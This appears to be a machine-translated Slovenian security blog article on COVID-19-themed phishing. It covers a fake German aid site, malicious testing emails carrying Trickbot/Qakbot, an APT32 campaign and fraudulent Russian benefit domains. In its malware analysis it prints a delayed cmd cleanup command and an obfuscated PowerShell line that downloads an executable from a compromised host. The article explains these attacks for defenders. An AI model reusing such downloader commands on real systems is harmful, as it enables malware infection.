Napadalci še naprej izkoriščajo temo COVID-19 in ustvarjajo vse več groženj za uporabnike, ki jih močno zanima vse, kar je povezano z epidemijo. IN O tem, katere vrste zlonamerne programske opreme so se pojavile po izbruhu koronavirusa, smo že govorili, danes pa bomo govorili o tehnikah socialnega inženiringa, s katerimi so se uporabniki v različnih državah, vključno z Rusijo, že srečali. Splošni trendi in primeri so pod rezom.
Zapomni si v Smo govorili o tem, da so ljudje pripravljeni brati ne le o koronavirusu in poteku epidemije, ampak tudi o ukrepih finančne podpore? Tukaj je dober primer. V nemški zvezni državi Severno Porenje-Vestfalija ali NRW so odkrili zanimiv lažni napad. Napadalci so ustvarili kopije spletne strani Ministrstva za gospodarstvo (), kjer lahko vsak zaprosi za denarno pomoč. Takšen program dejansko obstaja in izkazalo se je, da je koristen za prevarante. Ko so prejeli osebne podatke svojih žrtev, so se prijavili na spletni strani pravega ministrstva, vendar so navedli druge bančne podatke. Po uradnih podatkih je bilo do odkritja sheme podanih 4 tisoč takih lažnih zahtev. Tako je v roke goljufov padlo 109 milijonov dolarjev, namenjenih prizadetim državljanom.
Želite brezplačno testiranje na COVID-19?
Drug pomemben primer lažnega predstavljanja na temo koronavirusa je bil v elektronskih sporočilih. Sporočila so pritegnila pozornost uporabnikov s ponudbo za brezplačno testiranje na okužbo s koronavirusom. V priponki teh bili so primeri Trickbot/Qakbot/Qbot. In ko so tisti, ki so želeli preveriti svoje zdravje, začeli »izpolnjevati priloženi obrazec«, se je na računalnik naložil zlonamerni skript. In da bi se izognili testiranju v peskovniku, je skript začel prenašati glavni virus šele čez nekaj časa, ko so bili zaščitni sistemi prepričani, da do zlonamerne dejavnosti ne bo prišlo.
Tudi prepričati večino uporabnikov, da omogočijo makre, je bilo enostavno. Za to je bil uporabljen standardni trik: za izpolnitev vprašalnika morate najprej omogočiti makre, kar pomeni, da morate zagnati skript VBA.
Kot lahko vidite, je skript VBA posebej prikrit pred protivirusnimi programi.
Windows ima funkcijo čakanja, pri kateri aplikacija čaka /T <sekund>, preden sprejme privzeti odgovor »Da«. V našem primeru je skript čakal 65 sekund, preden je izbrisal začasne datoteke:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
In med čakanjem se je naložila zlonamerna programska oprema. Za to je bil zagnan poseben skript PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Po dekodiranju vrednosti Base64 skript PowerShell prenese stranska vrata, ki se nahajajo na predhodno vdrtem spletnem strežniku iz Nemčije:
http://automatischer-staubsauger.com/feature/777777.pngin ga shrani pod imenom:
C:UsersPublictmpdirfile1.exe
Mapa ‘C:UsersPublictmpdir’ se izbriše pri zagonu datoteke 'tmps1.bat', ki vsebuje ukaz cmd /c mkdir ""C:UsersPublictmpdir"".
Ciljni napad na vladne agencije
Poleg tega so analitiki FireEye pred kratkim poročali o ciljanem napadu APT32, namenjenem vladnim strukturam v Wuhanu in kitajskemu ministrstvu za upravljanje v izrednih razmerah. Eden od distribuiranih RTF-jev je vseboval povezavo do članka New York Timesa z naslovom . Vendar pa je bila ob branju prenesena zlonamerna programska oprema (analitiki FireEye so identificirali primer kot METALJACK).
Zanimivo je, da v času zaznave nobeden od protivirusnih programov ni zaznal tega primera, poroča Virustotal.
Ko uradne spletne strani ne delujejo
Najbolj osupljiv primer lažnega predstavljanja se je zgodil v Rusiji pred dnevi. Razlog za to je bilo imenovanje dolgo pričakovanega nadomestila za otroke, stare od 3 do 16 let. Ko je bil 12. maja 2020 objavljen začetek sprejema prijav, so milijoni pohiteli na spletno stran državnih služb po dolgo pričakovano pomoč in portal zrušili nič hujšega kot profesionalni napad DDoS. Ko je predsednik rekel, da "vladne službe niso kos pretoku prijav," so ljudje na spletu začeli govoriti o uvedbi alternativnega mesta za sprejemanje prijav.
Težava je v tem, da je naenkrat začelo delovati več spletnih mest, in medtem ko eno, pravo na posobie16.gosuslugi.ru, dejansko sprejema prijave, več .
Kolegi iz SearchInform so v coni .ru našli okoli 30 novih goljufivih domen. Infosecurity in Softline Company sta od začetka aprila sledila več kot 70 podobnim lažnim spletnim stranem državnih služb. Njihovi ustvarjalci manipulirajo z znanimi simboli in uporabljajo tudi kombinacije besed gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie ipd.
Hype in socialni inženiring
Vsi ti primeri samo potrjujejo, da napadalci uspešno monetizirajo temo koronavirusa. In večja ko je družbena napetost in bolj nejasna vprašanja, več možnosti imajo prevaranti, da ukradejo pomembne podatke, prisilijo ljudi, da se sami odrečejo svojemu denarju, ali preprosto vdrejo v več računalnikov.
In glede na to, da je pandemija potencialno nepripravljene množično prisilila v delo od doma, niso ogroženi le osebni, temveč tudi korporativni podatki. Nedavno so bili na primer uporabniki Microsoft 365 (prej Office 365) prav tako izpostavljeni lažnemu predstavljanju. Ljudje so prejeli ogromno "zgrešenih" glasovnih sporočil kot priloge pisem. Vendar so bile datoteke dejansko stran HTML, na katero so bile poslane žrtve napada . Posledično izguba dostopa in ogrožanje vseh podatkov iz računa.
Vir: www.habr.com